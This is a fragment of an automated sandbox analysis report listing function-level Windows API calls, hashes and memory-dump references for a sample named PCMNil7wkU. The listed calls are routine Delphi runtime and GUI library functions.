                                                                                                    • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                    • Instruction Fuzzy Hash: FB51F8B5A0062D9BDB32EB58C8D1BD9B3BCAF48214F0085D5E548E7281D7B0AF858F61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0411D6EF
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0411D6FE
                                                                                                      • Part of subcall function 0411D6BC: ResetEvent.KERNEL32(000002D8,0411D739), ref: 0411D6C2
                                                                                                    • EnterCriticalSection.KERNEL32(0419A2EC), ref: 0411D743
                                                                                                    • InterlockedExchange.KERNEL32(0416AAF0,?), ref: 0411D75F
                                                                                                    • LeaveCriticalSection.KERNEL32(0419A2EC,00000000,0411D88A,?,00000000,0411D8A9,?,0419A2EC), ref: 0411D7B8
                                                                                                    • EnterCriticalSection.KERNEL32(0419A2EC,0411D834,0411D88A,?,00000000,0411D8A9,?,0419A2EC), ref: 0411D827
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$CurrentEnterThread$EventExchangeInterlockedLeaveReset
                                                                                                    • String ID:
                                                                                                    • API String ID: 2189153385-0
                                                                                                    • Opcode ID: 2d9bdea4fcf65333915357fbafc4ee64bb470d0b5788d1b0c034644d9fce2211
                                                                                                    • Instruction ID: 8e4fa40dd9ffb610ddbc7a8d22c8e0056827ee227e24b70a4758223246f7da03
                                                                                                    • Opcode Fuzzy Hash: 2d9bdea4fcf65333915357fbafc4ee64bb470d0b5788d1b0c034644d9fce2211
                                                                                                    • Instruction Fuzzy Hash: 2E31E230B04644AFE715EFA8E8D1A29B7F8EB09718F51C4B0E404D26A0D7B57810CB61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetSystemMetrics.USER32(0000000B), ref: 04123F9A
                                                                                                    • GetSystemMetrics.USER32(0000000C), ref: 04123FA6
                                                                                                    • GetDC.USER32(00000000), ref: 04123FC2
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000E), ref: 04123FE9
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 04123FF6
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0412402F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CapsDeviceMetricsSystem$Release
                                                                                                    • String ID:
                                                                                                    • API String ID: 447804332-0
                                                                                                    • Opcode ID: 00e22db8de8ee731cdc78eee3c8e2e0551f2c3c8a80407071e57e384c9fc570b
                                                                                                    • Instruction ID: d26ce2e45d4b6a4ccb9c914347a54a8dee40dd8cc7f6f9f2ac8de28fd2a3e63c
                                                                                                    • Opcode Fuzzy Hash: 00e22db8de8ee731cdc78eee3c8e2e0551f2c3c8a80407071e57e384c9fc570b
                                                                                                    • Instruction Fuzzy Hash: 39316B70A00258EFEB04DFA4C980AAEBBB5FB49310F00C565E918EB384D771B951CF65
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 04124258: GetObjectA.GDI32(?,00000054), ref: 0412426C
                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 041243CE
                                                                                                    • SelectPalette.GDI32(?,?,00000000), ref: 041243EF
                                                                                                    • RealizePalette.GDI32(?), ref: 041243FB
                                                                                                    • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 04124412
                                                                                                    • SelectPalette.GDI32(?,00000000,00000000), ref: 0412443A
                                                                                                    • DeleteDC.GDI32(?), ref: 04124443
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Palette$Select$BitsCompatibleCreateDeleteObjectRealize
                                                                                                    • String ID:
                                                                                                    • API String ID: 1221726059-0
                                                                                                    • Opcode ID: 389bee0d898868317ede825c718af9a9ff15b9c77222746ee1c7c977385fafe9
                                                                                                    • Instruction ID: b9803c6e655273def8c15c4d9338e3c429212f613c863a2a8d33b9ebb0ac9ba1
                                                                                                    • Opcode Fuzzy Hash: 389bee0d898868317ede825c718af9a9ff15b9c77222746ee1c7c977385fafe9
                                                                                                    • Instruction Fuzzy Hash: C5114C75A046487BEB14DBA9DC80F9EB7FCEB48714F51C4A4B918E7280D7B4B9208B64
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 04123C11
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 04123C1A
                                                                                                    • GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,04126197,?,?,?,?,04124D0F), ref: 04123C2E
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 04123C3A
                                                                                                    • DeleteDC.GDI32(00000000), ref: 04123C40
                                                                                                    • CreatePalette.GDI32 ref: 04123C87
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateObjectSelect$ColorCompatibleDeletePaletteTable
                                                                                                    • String ID:
                                                                                                    • API String ID: 2515223848-0
                                                                                                    • Opcode ID: 375d48eb9e31519ac8834c5a97fa253e779463fef4c636cabd9599be4da00ed0
                                                                                                    • Instruction ID: c772139734384974121bf5ec08272359be57445e357711acdaa7ff63e9be5390
                                                                                                    • Opcode Fuzzy Hash: 375d48eb9e31519ac8834c5a97fa253e779463fef4c636cabd9599be4da00ed0
                                                                                                    • Instruction Fuzzy Hash: C801807120432466E614B7398EC2B6B72F89F80718F04C82AB999D72C1E7B9E8758356
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 04122AA8: CreateBrushIndirect.GDI32(?), ref: 04122B53
                                                                                                    • UnrealizeObject.GDI32(00000000), ref: 041232EC
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 041232FE
                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 04123321
                                                                                                    • SetBkMode.GDI32(?,00000002), ref: 0412332C
                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 04123347
                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 04123352
                                                                                                      • Part of subcall function 04121CEC: GetSysColor.USER32(?), ref: 04121CF6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                                                    • String ID:
                                                                                                    • API String ID: 3527656728-0
                                                                                                    • Opcode ID: b936ff3cfe8b0aad2d347385d28b58bdd603c5ecf80da84ec6aa700f880e543c
                                                                                                    • Instruction ID: ce8c6f338f6ce5376ca173d257d3b33794d001e71384ea46f321944da2d9dc89
                                                                                                    • Opcode Fuzzy Hash: b936ff3cfe8b0aad2d347385d28b58bdd603c5ecf80da84ec6aa700f880e543c
                                                                                                    • Instruction Fuzzy Hash: 38F034B5600114AFEF14FFB8DAC5E1F67ACAF4420A7448490B948DF696CBA5F8308731
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 041036F2
                                                                                                    • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,04103741,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 04103725
                                                                                                    • RegCloseKey.ADVAPI32(?,04103748,00000000,?,00000004,00000000,04103741,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0410373B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                    • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                    • API String ID: 3677997916-4173385793
                                                                                                    • Opcode ID: d23ecf5eb43ad90c040b6ddfab398b6a4a1457d1e521bbe2395e117c69917866
                                                                                                    • Instruction ID: f3378d127ccdee9c8c80a6f6781d07f97020a4bb206c01982e62ba6529850294
                                                                                                    • Opcode Fuzzy Hash: d23ecf5eb43ad90c040b6ddfab398b6a4a1457d1e521bbe2395e117c69917866
                                                                                                    • Instruction Fuzzy Hash: 2A01B5B594034CBAEB11EB91CD81BB973ECDB09B00F608061FA10E65C0E7B9B950DB55
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • MulDiv.KERNEL32(00000000,00000060,00000000), ref: 0414BC0B
                                                                                                    • MulDiv.KERNEL32(?,00000000,00000000), ref: 0414BC9A
                                                                                                    • MulDiv.KERNEL32(?,00000000,00000000), ref: 0414BCC9
                                                                                                    • MulDiv.KERNEL32(?,00000000,00000000), ref: 0414BCF8
                                                                                                    • MulDiv.KERNEL32(?,00000000,00000000), ref: 0414BD1B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: da3480db584f96303ac14471d9b0fc844e5f5e303fd7b4ef188c5776db9bbca5
                                                                                                    • Instruction ID: 3a1f8c6351ce504566de5eb5628c12a4f5ea70085356770065052b6efee1debe
                                                                                                    • Opcode Fuzzy Hash: da3480db584f96303ac14471d9b0fc844e5f5e303fd7b4ef188c5776db9bbca5
                                                                                                    • Instruction Fuzzy Hash: 4981B374B04248EFDB44DB99D588EA9B7F9AF88304F2541E5E408DB365CB74BE40DB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetMenu.USER32(00000000), ref: 0414D800
                                                                                                    • SetMenu.USER32(00000000,00000000), ref: 0414D81D
                                                                                                    • SetMenu.USER32(00000000,00000000), ref: 0414D852
                                                                                                    • SetMenu.USER32(00000000,00000000), ref: 0414D86E
                                                                                                      • Part of subcall function 0410669C: LoadStringA.USER32(00000000,0000FFF3,?,00001000), ref: 041066CE
                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000037), ref: 0414D8B5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$LoadStringWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 1738039741-0
                                                                                                    • Opcode ID: fcf7f0a5cf2121a780d3dbfcdc661f9bc51627605bf8c310f0c81263a47274c4
                                                                                                    • Instruction ID: 8dffc49ecbd708a800a7409ee571a0106e5b999d00c9fbc4b860d4013b254ad4
                                                                                                    • Opcode Fuzzy Hash: fcf7f0a5cf2121a780d3dbfcdc661f9bc51627605bf8c310f0c81263a47274c4
                                                                                                    • Instruction Fuzzy Hash: 7C51A030A443455BEF25AF78ECC87AA37A5AF80318F0544F5EC149B2D6DB78F8858760
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • DrawEdge.USER32(00000000,?,00000006,00000002), ref: 0412FFFF
                                                                                                    • OffsetRect.USER32(?,00000001,00000001), ref: 04130050
                                                                                                    • DrawTextA.USER32(00000000,00000000,?,?,?), ref: 04130089
                                                                                                    • OffsetRect.USER32(?,000000FF,000000FF), ref: 04130096
                                                                                                    • DrawTextA.USER32(00000000,00000000,?,?,?), ref: 04130101
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Draw$OffsetRectText$Edge
                                                                                                    • String ID:
                                                                                                    • API String ID: 3610532707-0
                                                                                                    • Opcode ID: c6a691009d537d940999f167ece6aac9128bddada570c0ffaedc13f9bd11ea10
                                                                                                    • Instruction ID: 3ead1b888a7135a64d4b734b5b1612098076118a8139f90e2e19d2c7670f2580
                                                                                                    • Opcode Fuzzy Hash: c6a691009d537d940999f167ece6aac9128bddada570c0ffaedc13f9bd11ea10
                                                                                                    • Instruction Fuzzy Hash: 2B517F71A00218AFEB20EFA8CAC0B9EBBF5AF09324F158191F914E7294C774FD519B50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 04137F88: WindowFromPoint.USER32(-000000F7,?,00000000,04137B5A,?,-00000010,?), ref: 04137F8E
                                                                                                      • Part of subcall function 04137F88: GetParent.USER32(00000000), ref: 04137FA5
                                                                                                    • GetWindow.USER32(00000000,00000004), ref: 04137B62
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 04137C36
                                                                                                    • EnumThreadWindows.USER32(00000000,04137AD4,?), ref: 04137C3C
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 04137C53
                                                                                                    • IntersectRect.USER32(?,?,?), ref: 04137CC1
                                                                                                      • Part of subcall function 04136FC8: GetWindowThreadProcessId.USER32(?), ref: 04136FD5
                                                                                                      • Part of subcall function 04136FC8: GetCurrentProcessId.KERNEL32(?,00000000,?,04133C39,?,04132CF5), ref: 04136FDE
                                                                                                      • Part of subcall function 04136FC8: GlobalFindAtomA.KERNEL32(00000000), ref: 04136FF3
                                                                                                      • Part of subcall function 04136FC8: GetPropA.USER32(?,00000000), ref: 0413700A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Thread$CurrentProcessRect$AtomEnumFindFromGlobalIntersectParentPointPropWindows
                                                                                                    • String ID:
                                                                                                    • API String ID: 2202917067-0
                                                                                                    • Opcode ID: 3d1e656028c3765a5a87a6ac848f441fe345fc5eddf9c925fd5b0f10458f2cf1
                                                                                                    • Instruction ID: d868e5ebdd125cf1a14242b24fd491ad4f4f2052841c9a8f435b1fdf18e6096d
                                                                                                    • Opcode Fuzzy Hash: 3d1e656028c3765a5a87a6ac848f441fe345fc5eddf9c925fd5b0f10458f2cf1
                                                                                                    • Instruction Fuzzy Hash: E5514C71A0020AAFDB10DF69C4C4AAEB7F4AF08655F1485A1F824EB380D734FD46CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • BeginPaint.USER32(00000000,?), ref: 0413F91F
                                                                                                    • SaveDC.GDI32(00000000), ref: 0413F958
                                                                                                    • ExcludeClipRect.GDI32(00000000,?,?,?,?,00000000,0413FA16,?,00000000), ref: 0413F9DA
                                                                                                    • RestoreDC.GDI32(00000000,?), ref: 0413FA10
                                                                                                    • EndPaint.USER32(00000000,?,0413FA5A), ref: 0413FA4D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                                    • String ID:
                                                                                                    • API String ID: 3808407030-0
                                                                                                    • Opcode ID: 4938bc79e9e3460a61776b4a44ecdadc36a18f983a62f4f8c88057c8c7e97314
                                                                                                    • Instruction ID: bbee12150ce5d8d5c81742497291d329ffbb85734c24de080df67c4668ab0e30
                                                                                                    • Opcode Fuzzy Hash: 4938bc79e9e3460a61776b4a44ecdadc36a18f983a62f4f8c88057c8c7e97314
                                                                                                    • Instruction Fuzzy Hash: 7C414E70A04248AFDB14DF98C899FAEBBF5FF48309F1544E8E548972A1D774AD46CB10
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8fc238d90b0112716c3fd1607c3e59ffdbea03a581490091b9b150f23e255a85
                                                                                                    • Instruction ID: f7223b2e996ff313caabd09f17e1d82de8ec3465be77977bd8c5348a4c0fe1b2
                                                                                                    • Opcode Fuzzy Hash: 8fc238d90b0112716c3fd1607c3e59ffdbea03a581490091b9b150f23e255a85
                                                                                                    • Instruction Fuzzy Hash: FD11E7317003789AEBA1BF79CBC4B6B32A98F01A48F415055FD00DB282DB64F827A350
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 041261A2
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 041261B7
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000E), ref: 041261C1
                                                                                                    • CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,04124D0F,00000000,04124D9B), ref: 041261E5
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 041261F0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CapsDevice$CreateHalftonePaletteRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 2404249990-0
                                                                                                    • Opcode ID: 7c6e7a767be6ce78f2737d223bdc8c68bb645a5318e23a15340825ae83bd1da5
                                                                                                    • Instruction ID: 5ed9967c25cf6d89a67011aa31bd10357539bfb625205a95b49cedb56c2e0777
                                                                                                    • Opcode Fuzzy Hash: 7c6e7a767be6ce78f2737d223bdc8c68bb645a5318e23a15340825ae83bd1da5
                                                                                                    • Instruction Fuzzy Hash: 1C115E316013B9AFEB20AF248AD07EE3B91AF91355F044165FC54EA5C1D7F5B8A483A1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetWindowLongA.USER32(00000000,000000EC), ref: 04150E6C
                                                                                                    • SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 04150E9E
                                                                                                    • SetLayeredWindowAttributes.USER32(00000000,?,?,00000000,00000000,000000EC,?,?,0414E59C), ref: 04150ED7
                                                                                                    • SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 04150EF0
                                                                                                    • RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,000000EC,00000000,00000000,000000EC,?,?,0414E59C), ref: 04150F06
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Long$AttributesLayeredRedraw
                                                                                                    • String ID:
                                                                                                    • API String ID: 1758778077-0
                                                                                                    • Opcode ID: ba9e005b8a0f23e861c937e85795a726bf8af5b744b239761797b8289c533d1b
                                                                                                    • Instruction ID: 6353416df6ef07e796aa129fde0bc226cff58389b89f8eeee865a19515916045
                                                                                                    • Opcode Fuzzy Hash: ba9e005b8a0f23e861c937e85795a726bf8af5b744b239761797b8289c533d1b
                                                                                                    • Instruction Fuzzy Hash: A211CA716082A067EB11BAB84CD8BD52B8C4B4931CF1845F1BD65EA1D2C768F988CB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 04123B78
                                                                                                    • GetDeviceCaps.GDI32(?,00000068), ref: 04123B94
                                                                                                    • GetPaletteEntries.GDI32(08080EC2,00000000,00000008,?), ref: 04123BAC
                                                                                                    • GetPaletteEntries.GDI32(08080EC2,00000008,00000008,?), ref: 04123BC4
                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 04123BE0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EntriesPalette$CapsDeviceRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 3128150645-0
                                                                                                    • Opcode ID: 8764b038fee1b431ebbaf266bd25a75310700eb27f2d00e3dc514fe81ee75e2f
                                                                                                    • Instruction ID: 156fd12479e2c09494b29dda14923dc73a4adf94efc4a17da2cfe95884430098
                                                                                                    • Opcode Fuzzy Hash: 8764b038fee1b431ebbaf266bd25a75310700eb27f2d00e3dc514fe81ee75e2f
                                                                                                    • Instruction Fuzzy Hash: 8B11E1316483486FFB00CEB88C82F6977A8E704704F40C096F564DA1C0DBBBB954CB24
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetThreadLocale.KERNEL32(?,00000000,0410BBE7,?,?,00000000), ref: 0410BB68
                                                                                                      • Part of subcall function 0410B8C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0410B8E2
                                                                                                    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0410BBE7,?,?,00000000), ref: 0410BB98
                                                                                                    • EnumCalendarInfoA.KERNEL32(Function_0000BA9C,00000000,00000000,00000004), ref: 0410BBA3
                                                                                                    • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0410BBE7,?,?,00000000), ref: 0410BBC1
                                                                                                    • EnumCalendarInfoA.KERNEL32(Function_0000BAD8,00000000,00000000,00000003), ref: 0410BBCC
                                                                                                    Memory Dump Source
